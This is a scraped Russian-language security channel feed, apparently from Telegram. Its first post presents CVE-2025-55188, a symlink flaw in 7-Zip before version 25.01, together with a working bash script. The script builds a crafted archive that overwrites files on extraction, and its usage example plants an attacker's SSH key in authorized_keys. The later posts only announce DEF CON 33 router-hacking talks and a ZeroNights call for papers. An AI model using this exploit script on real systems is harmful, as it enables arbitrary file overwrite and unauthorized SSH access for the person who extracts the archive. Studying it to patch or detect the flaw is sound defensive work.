CVE-2025-55188
7z-exploit
Symlink Arbitrary File
7-Zip до 25.01.
Уязвимость возникает из-за того, что 7-Zip неправильно обрабатывает сим линки во время извлечения, что позволяет созданному архиву перезаписывать файлы в системе.
7z-exploit
Symlink Arbitrary File
7-Zip до 25.01.
Уязвимость возникает из-за того, что 7-Zip неправильно обрабатывает сим линки во время извлечения, что позволяет созданному архиву перезаписывать файлы в системе.
#!/bin/bash
if [ "$#" -ne 3 ]; then
echo "Usage: $0 <payload_file> <target_symlink_path> <output_archive>"
echo "Example: $0 mykey.pub ../../.ssh/authorized_keys exploit.7z"
exit 1
fi
PAYLOAD="$1"
TARGET="$2"
OUT="$3"
WORKDIR=$(mktemp -d)
ln -s "$TARGET" "$WORKDIR/symlink"
cp "$PAYLOAD" "$WORKDIR/symlink"
tar --sort=name -cf "$WORKDIR/exploit.tar" -C "$WORKDIR" symlink
7z a "$OUT" "$WORKDIR/exploit.tar" >/dev/null
echo "[*] Exploit archive created: $OUT"
rm -rf "$WORKDIR"
🔥56👍8
DEF CON 33
*
Начинают подъезжать доклады с дефон33
*
Hacking Hotspots: Pre-Auth Remote Code Execution, Arbitrary SMS & Adjacent Attacks on 5G & 4G LTE Routers
#defcon
*
Начинают подъезжать доклады с дефон33
*
Hacking Hotspots: Pre-Auth Remote Code Execution, Arbitrary SMS & Adjacent Attacks on 5G & 4G LTE Routers
#defcon
🔥30👍5
ZeroNights 2025 открывает прием заявок на доклады!
Конференция по информационной безопасности ZeroNights анонсирует Call for Papers!
Ребята всегда собирали на сцене классных спикеров и доклады, которые можно было применять на практике. В этом году конфа снова в деле и у каждого есть возможность выступить на сцене перед самым активным комьюнити: поделиться исследованиями и инсайдами, обменяться опытом и просто отлично провести время.
Набирают доклады Offensive и AppSec/SecOps направленности, за эксклюзивы поощряют материально ;)
Узнать подробности и подать заявку можно на сайте конференции.
Есть что сказать? Не держи в себе ;)
#hackers #conf #zeronights
Конференция по информационной безопасности ZeroNights анонсирует Call for Papers!
Ребята всегда собирали на сцене классных спикеров и доклады, которые можно было применять на практике. В этом году конфа снова в деле и у каждого есть возможность выступить на сцене перед самым активным комьюнити: поделиться исследованиями и инсайдами, обменяться опытом и просто отлично провести время.
Набирают доклады Offensive и AppSec/SecOps направленности, за эксклюзивы поощряют материально ;)
Узнать подробности и подать заявку можно на сайте конференции.
Есть что сказать? Не держи в себе ;)
#hackers #conf #zeronights
🔥22👍4